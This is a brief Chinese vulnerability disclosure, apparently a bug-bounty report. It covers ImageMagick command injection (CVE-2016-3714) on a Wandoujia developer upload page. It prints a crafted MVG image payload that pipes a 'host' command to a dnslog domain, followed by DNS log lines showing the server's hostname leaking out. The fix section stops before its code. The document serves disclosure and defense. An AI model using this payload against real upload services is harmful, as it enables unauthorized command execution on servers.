豌豆荚某站命令执行

之前的都没有修貌似

CVE-2016-3714 以及新的绕过方式

开发者站点

http://open.wandoujia.com/account/info

认证开发者，营业执照上传处，上传构造好的图片

push graphic-context

viewbox 0 0 640 480

image Over 0,0 0,0 '|host zzz.zzz.dnslog.info'

pop graphic-context

cloudeye中监测到的请求

31-May-2016 22:23:06.450 queries: client 111.206.15.136#3139 (ag-devcenter0-cnc1.hlg01.xxx.dnslog.info): query: ag-devcenter0-cnc1.hlg01.xxx.dnslog.info IN A -ED (128.199.200.236)

31-May-2016 22:23:06.631 queries: client 111.206.14.132#38484 (ag-devcenter0-cnc1.hlg01.xxx.dnslog.info): query: ag-devcenter0-cnc1.hlg01.xxx.dnslog.info IN AAAA -ED (128.199.200.236)

31-May-2016 22:23:06.818 queries: client 111.206.14.132#41208 (ag-devcenter0-cnc1.hlg01.xxx.dnslog.info): query: ag-devcenter0-cnc1.hlg01.xxx.dnslog.info IN MX -ED (128.199.200.236)

31-May-2016 22:23:10.717 queries: client 111.206.14.132#62669 (ag-devcenter0-cnc1.hlg01.xxx.dnslog.info): query: ag-devcenter0-cnc1.hlg01.xxx.dnslog.info IN A -ED (128.199.200.236)

31-May-2016 22:23:10.917 queries: client 111.206.15.136#23942 (ag-devcenter0-cnc1.hlg01.xxx.dnslog.info): query: ag-devcenter0-cnc1.hlg01.xxx.dnslog.info IN AAAA -ED (128.199.200.236)

ag-devcenter0-cnc1.hlg01 为当前服务器主机名

解决方案：

/etc/ImageMagick/policy.xml中添加如下代码

——